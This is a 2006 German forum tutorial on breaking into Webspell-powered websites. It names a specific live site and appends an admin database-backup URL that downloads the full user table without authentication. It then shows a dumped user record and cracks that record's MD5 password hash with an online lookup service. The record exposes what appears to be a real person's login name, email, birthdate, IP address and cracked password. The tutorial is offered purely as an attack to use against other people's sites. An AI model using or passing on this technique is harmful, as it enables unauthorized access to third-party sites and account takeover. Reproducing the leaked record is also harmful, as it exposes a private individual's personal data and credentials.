[Hacking] Webspell: Admin Passwörter hacken

Dieses Thema im Forum "Security Tutorials" wurde erstellt von Mr_MeYa, 2. November 2006 .

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. Mr_MeYa
    Mr_MeYa Neu
    Stammnutzer
    #1 2. November 2006
    Webspell: Admin Passwörter hacken

    ier mal ein Tutorial wie man Webspell hackt ;)

    Also als erstes nehmen wir uns mal eine Seite die auf Webspell läuft. Ich habe mir diese hier genommen.
    http://goeclan.go.funpic.de/tesports/index.php?site=news

    Nun fügen wir anstatt des
    Code:
    /index.php?site=news
    wir dort nun:
    Code:
    /admin/database.php?action=write&userID=1
    ein.
    Danach sieht das ganze so aus:
    Code:
    http://goeclan.go.funpic.de/tesports/admin/database.php?action=write&userID=1

    Wenn diese Adresse nun bestätigt müsste ein Downloadfenster mit der Meldung das eine Backup.sql geladen werden soll. Die Organisiert ihr euch auch.

    Nun nehmt ihr einen Editor unserer wahl, zB. Notepad++. Dort sucht ihr nach diesen Einträgen (Normalerweise sind dort mehr, hab zur veranschauligung nur einen genommen):
    Code:
    INSERT INTO `webs_user` (`userID`, `registerdate`, `lastlogin`, `username`, `password`, `nickname`, `email`, `firstname`, `lastname`, `sex`, `country`, `town`, `birthday`, `icq`, `avatar`, `usertext`, `userpic`, `clantag`, `clanname`, `clanhp`, `clanirc`, `clanhistory`, `cpu`, `mainboard`, `ram`, `monitor`, `graphiccard`, `soundcard`, `verbindung`, `keyboard`, `mouse`, `mousepad`, `newsletter`, `homepage`, `about`, `pmgot`, `pmsent`, `visits`, `banned`, `ip`, `topics`, `articles`, `demos`, `files`, `gallery_pictures`, `mailonpm`, `userdescription`, `activated`) VALUES ('4', '1161426312', '1162375788', 'Christophgoe', 'f2a0ffe83ec8d44f2be4b624b0f47dde', 'FoX', 'Johanna.Wiedemann@t-online.de', 'Chris', '', 'm', 'de', '...', '1991-03-18 00:00:00', '204-282-537v', '', '', '4.jpg', 'Ť-ę.ﮜρořŤﻜ', 'Ť-ę.ﮜρořŤﻜ', 'http://www.t-e.sports.de.vu/', 'n/a', '-=STF=- BH ....', '3.0', 'kA', '512 DDR', '15° TfT', '', 'On board', 'Dls 1000', 'Medion', 'Medion', 'Speedpad', '1', 'http://www.t-e.sports.de.vu/', '', '22', '0', '4', '0', '217.238.24.98', '', '', '', '', '', '0', '', '1');
    Nun haben wir schonmal einen MD5-Hash und einen Login-Namen.
    Code:
    Loginname: Christophgoe.
    MD5-Hash: f2a0ffe83ec8d44f2be4b624b0f47dde
    Nun nehmen wir einen MD5 reverse lookup. Ich habe diesen hier genommen: http://nz.md5.crysm.net/ ihr könnt aber auch diesen nehmen: md5cracker.de - de beste bron van informatie over md5cracker. Deze website is te koop!

    Dort gebt ihr nun den MD5-Hash ein. Und es wird ausgegeben das es "hans" heißt.

    Also das Passwort ist hans und der Loginname ist Christophgoe.

    Das wars schon.

    HF und GL.
    Mr_MeYa
     

  2. Anzeige

  3. Videos zum Thema